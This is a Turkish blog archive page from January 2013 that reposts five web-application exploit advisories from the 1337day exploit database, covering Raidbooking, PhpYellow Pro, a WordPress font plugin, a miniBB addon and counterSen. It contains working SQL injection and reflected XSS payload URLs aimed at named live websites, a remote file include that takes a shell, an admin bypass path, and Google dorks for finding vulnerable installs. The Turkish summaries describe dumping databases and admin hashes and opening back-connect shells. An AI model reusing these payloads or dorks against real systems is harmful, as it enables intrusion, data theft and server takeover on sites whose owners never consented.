Archive for 27 Ocak 2013

Raidbooking v.1.1 Sql Injection Vulnerability

Raidbooking v.1.1 Sql Injection Açığı bulunmuş oluş sql injectionun açıklarıyla neler yapılabileceğini anlatmıştım.
Açık oluşum yeri ve açık hakkındaki exploit.

[+]~P0c : 
localhost/raid.php?id=1
 
[+]~Examples:
http://mossraid.wz.cz//raid.php?id=1%27
http://wow.boule.cz/raids/raid.php?id=1%27
http://www.fredzy.fr/WOW/raid_CP/raid.php?id=1%27%22
 
(---|~DzMafia~|---)
We Are : PassWord | BackUp | Gel-dz | EliteTrojan | Lakamora | JIGsaw | Evil-Dz
 
fb.me/AlgerianMafia
fb.me/elitetrojan
 
# 01EF407405E52197   1337day.com [2013-01-27]   C1B5F30A00438C37 #

PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities

PhpYellow Pro Edition XSS/SQL Injection Açıkları bulundu.
Açıkla MYSQL veri tabanını bağlanılarak bilgiler alınabilmekte, XSS açıklarıyla zararlı kodlar çalıştırabilmekte.
Açık Exploit

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
 
# Error Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
 
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
 
# BECC55EC920E93FC   1337day.com [2013-01-27]   214750033779CE53 #
 

WordPress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability

WordPress Dynamic Font Replacement 1.3 eklentisinde SQL Injection açığı bulundu. Açıkla MYSQL veri tabanını bağlanılarak tablo bilgileri okunabilmekte server admin ve userlerin hashları alınabilmektedir.
Açığın oluşum yeri ve açık hakkındaki exploit.

# Exploit Title: WordPress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability 
# Date: 2013-01-27
# Author: bd0rk
#Software Link: http://downloads.wordpress.org/plugin/dynamic-font-replacement-4wp.zip
# Version: 1.3 EN
# Category:: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Windows and Ubuntu-Linux
 
----------------------------------------------------------------------------
 
Vulnerable code infile /admin/listings.php
 
SQL Injection Parameter: 'id'
 
[+]spl0iT: http://[target]/wp-content/plugins/dynamic-font-replacement-4wp/admin/listings.php?id=[SQLInjection-Code]
 
----------------------------------------------------------------------------
 
Greetings from cold Germany, bd0rk.
 
==> REST IN PEACE AARON SWARTZ <==
 
# 14670541C658329E   1337day.com [2013-01-27]   E83548C9685E497D #

miniBB 3.x Addon preview Remote File Include Vulnerability

miniBB 3.x Addon preview Remote File Include (RFI) açığı bulunmuş olup, scriptte meydadana gelen açıkla servere uzaktan bağlanabilmekte, server üzerinden back connect yapılabilmekte zararlı kodlar çalıştırılabilmektedir.

# Exploit Title: miniBB 3.x Addon preview Remote File Include Vulnerability
# Date: 2013-01-27
# Author: bd0rk
# Vendor or Software Link: http://www.minibb.com/download.php?file=minibb_plugin_preview
# Version: for miniBB 3.x
# Category:: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Ubuntu-Linux
 
------------------------------------------------------------------------
 
I found vulnerable code infile addon_preview.php line: 12
 
So an attacker can use it to compromise the system.
 
Not declared before &require parameter is: $pathToFiles
------------------------------------------------------------------------
[+]spl0iT: http://[target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
------------------------------------------------------------------------
 
Greetings from cold Germany,bd0rk.
 
==> REST IN PEACE AARON SWARTZ <==
 

counterSen 1.1.0 Admin Bypass Vulnerability

counterSen 1.1.0 Admin Bypass açığı bulunmuş olup açığın oluşum yeri, Açıkla ilgili scriptin download adresi aşağıda verilmiştir.

=> counterSen 1.1.0 Admin Bypass Vulnerability
 
=> Discovered by: bd0rk
 
=> Contact: bd0rk[at]hackermail.com
 
=> Greetz: exploit-db.com, zone-h.org, Mandy, rgod, 1930
 
=> Affected Software: counterSen 1.1.0
 
=> Vendor: http://www.sensiebels.de/
 
=> DownloaD: http://www.sensiebels.de/download/download.php?id=countersen&fn=countersen&ex=zip
 
TESTED ON: Ubuntu-Linux
 
------------------------------------------------------
Exploit: http://[y0uRh0sT]/countersen/admin/index.php
------------------------------------------------------
 
 
The 24 years old, german Hacker bd0rk <---white-hat 🙂
 
SpecialComment: NO WAR AROUND THE WORLD!
 
# A1D391B6E56CDFB7   1337day.com [2013-01-27]   000D280754EED474 #